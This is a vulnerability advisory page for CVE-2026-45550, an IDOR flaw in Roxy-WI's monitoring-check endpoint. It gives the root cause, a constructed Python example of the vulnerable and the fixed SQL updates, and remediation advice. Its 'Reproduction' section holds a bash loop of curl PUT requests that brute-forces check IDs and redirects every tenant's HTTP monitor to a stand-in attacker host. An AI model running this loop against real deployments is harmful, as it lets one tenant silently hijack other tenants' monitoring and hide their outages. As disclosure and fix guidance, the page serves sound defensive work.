CVE-2026-45550
Description
Roxy-WI versions prior to 8.2.6.4 allow authenticated users to modify any monitoring check due to insufficient access controls.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Roxy-WI versions 8.2.6.4 and prior contain an Insecure Direct Object Reference (IDOR) vulnerability in the PUT /smon/check endpoint. The endpoint only verifies that the authenticated user belongs to a group, but does not check if the target smon_id belongs to that user's group. This allows any authenticated user to modify monitoring checks belonging to other tenants [1].
Exploitation
An attacker needs to be authenticated to Roxy-WI. The attacker can then send a crafted PUT request to the /smon/check endpoint, providing a check_id belonging to another user's monitoring configuration and new values for the check. The application will then update the monitoring check without proper authorization verification [1].
Impact
Successful exploitation allows any authenticated user to silently rewrite the configuration of any monitoring check, including HTTP, TCP, Ping, and DNS checks. This could lead to the disruption of monitoring services or the redirection of traffic to malicious destinations, depending on the nature of the monitoring check being modified [1].
Mitigation
At the time of publication, there are no publicly available patches for this vulnerability. Users are advised to monitor the project's security advisories for updates. It is recommended to restrict access to Roxy-WI to only trusted users until a patch is released [1].
AI Insight generated on Jun 10, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 1
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"The application fails to properly filter database updates by user group, allowing any authenticated user to modify another tenant's monitoring checks."
Attack vector
An authenticated user can send a PUT request to `/smon/check` with a target `check_id` belonging to another tenant. The application only verifies that the caller has a group membership, not that the target `check_id` belongs to that group. This allows the attacker to overwrite monitoring configurations like URLs or bodies for any check ID. The advisory notes that even a guest role suffices for this attack [ref_id=1].
Affected code
The vulnerability lies in the PUT request handling for `/smon/check` in `app/routes/smon/routes.py`. Specifically, the `roxywi_common.check_user_group_for_flask()` function only checks for caller group membership. The downstream SQL update functions `update_smon`, `update_smonHttp`, `update_smonTcp`, `update_smonPing`, and `update_smonDns` in `app/modules/db/smon.py` execute updates with a `WHERE smon_id = ?` clause lacking a user group filter, unlike the correctly filtered DELETE path.
What the fix does
The advisory indicates that no patches are publicly available at the time of publication. The recommended remediation is to apply a user_group filter to the `update_smon` SQL query and similar functions for HTTP, TCP, Ping, and DNS checks. Additionally, a check should be added at the route level to ensure the `check_id` belongs to the caller's group before allowing the update to prevent foreign checks from being modified [ref_id=1].
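The affected-code and fix paragraphs above describe the defect as a `WHERE smon_id = ?` clause with no tenant filter, and the remediation as a `user_group` filter in the SQL plus a route-level ownership check. The following is an added, constructed example and not Roxy-WI's code: a minimal SQLite model with two tenants, the unscoped update beside the group-scoped update, and a hypothetical `put_check` handler that applies both layers. The table, column and function names here are assumptions for illustration only.

```python
"""
Constructed example (not Roxy-WI's code): a minimal SQLite model of a
monitoring-check table, the IDOR-prone update (WHERE smon_id = ? only)
beside the tenant-scoped update (WHERE smon_id = ? AND user_group = ?),
plus the route-level ownership check the advisory recommends.
Table/column names are assumptions for illustration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Two tenants (groups 1 and 2), one HTTP check each. Constructed data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE smon (smon_id INTEGER PRIMARY KEY, user_group INTEGER NOT NULL, "
        "name TEXT NOT NULL, url TEXT NOT NULL, enabled INTEGER NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO smon (smon_id, user_group, name, url, enabled) VALUES (?, ?, ?, ?, ?)",
        [
            (1, 1, "tenant1-web", "https://tenant1.example/health", 1),
            (2, 2, "tenant2-web", "https://tenant2.example/health", 1),
        ],
    )
    return conn


def update_smon_unscoped(conn, smon_id, name, url, enabled) -> int:
    """Vulnerable shape: the WHERE clause selects by id only, so any caller
    who knows or guesses smon_id overwrites another tenant's check."""
    cur = conn.execute(
        "UPDATE smon SET name = ?, url = ?, enabled = ? WHERE smon_id = ?",
        (name, url, enabled, smon_id),
    )
    return cur.rowcount


def update_smon_scoped(conn, smon_id, user_group, name, url, enabled) -> int:
    """Hardened shape: the caller's group is part of the WHERE clause, so a
    foreign smon_id matches zero rows (the pattern the DELETE path already uses)."""
    cur = conn.execute(
        "UPDATE smon SET name = ?, url = ?, enabled = ? "
        "WHERE smon_id = ? AND user_group = ?",
        (name, url, enabled, smon_id, user_group),
    )
    return cur.rowcount


def check_belongs_to_group(conn, smon_id, user_group) -> bool:
    """Route-level ownership check: defense in depth on top of the scoped SQL."""
    row = conn.execute(
        "SELECT 1 FROM smon WHERE smon_id = ? AND user_group = ?",
        (smon_id, user_group),
    ).fetchone()
    return row is not None


def put_check(conn, caller_group, payload) -> tuple:
    """Hypothetical handler for PUT /smon/check with both layers applied.
    Returns (http_status, message). A 404 rather than 403 avoids confirming
    to the caller that the foreign id exists."""
    smon_id = int(payload["check_id"])
    if not check_belongs_to_group(conn, smon_id, caller_group):
        return 404, "check not found"
    changed = update_smon_scoped(
        conn, smon_id, caller_group, payload["name"], payload["url"], int(payload["enabled"])
    )
    if changed != 1:
        return 404, "check not found"
    conn.commit()
    return 200, "updated"


def url_of(conn, smon_id) -> str:
    return conn.execute("SELECT url FROM smon WHERE smon_id = ?", (smon_id,)).fetchone()[0]


def demo() -> dict:
    """A caller in group 1 tries to rewrite check 2 (owned by group 2),
    first through the unscoped update, then through the hardened handler."""
    foreign = {"check_id": 2, "name": "x", "url": "http://example.invalid/redirected", "enabled": 0}
    conn = make_db()
    unscoped_rows = update_smon_unscoped(
        conn, 2, foreign["name"], foreign["url"], foreign["enabled"]
    )
    unscoped_url = url_of(conn, 2)
    conn = make_db()
    scoped_status, _ = put_check(conn, 1, foreign)
    scoped_url = url_of(conn, 2)
    own = {"check_id": 1, "name": "tenant1-web", "url": "https://tenant1.example/healthz", "enabled": 1}
    own_status, _ = put_check(conn, 1, own)
    return {
        "unscoped_rows": unscoped_rows, "unscoped_url": unscoped_url,
        "scoped_status": scoped_status, "scoped_url": scoped_url,
        "own_status": own_status, "own_url": url_of(conn, 1),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the unscoped update silently changing tenant 2's URL (one row affected), while the hardened handler returns 404 for the same request, leaves tenant 2's check untouched, and still lets the caller update its own check. Keeping the group filter in the SQL as well as in the route check means a future call site that forgets the route check still cannot cross tenants.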
Preconditions
- auth: An authenticated user session is required.
Reproduction
```bash
# Logged-in as a role=3 user in tenant1, with NO membership in tenant2.
# Brute-force iterate the small smon_id space:
for ID in $(seq 1 200); do
  curl $COOKIE -H 'Content-Type: application/json' \
    -X PUT "https://$TARGET/smon/check" -d @- <<JSON
{"check_id": $ID, "check_type": "http", "name": "x", "ip":"x.x", "port":"443", "enabled":"0",
 "url":"http://attacker.example/oast","body":"", "group":"", "desc":"hijacked",
 "tg":"0","slack":"0","pd":"0","mm":"0",
 "resolver":"","record_type":"a","packet_size":"56",
 "http_method":"GET","interval":"60","agent_id":"1"}
JSON
done
```

Every existing HTTP monitor in the Roxy-WI deployment is now polling attacker.example/oast. The original tenant's "service is healthy" indicator stays green because the URL the agent polls returns 200; meanwhile their real production endpoint is no longer being monitored. [ref_id=1]
Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 1
News mentions: 0
No linked articles in our index yet.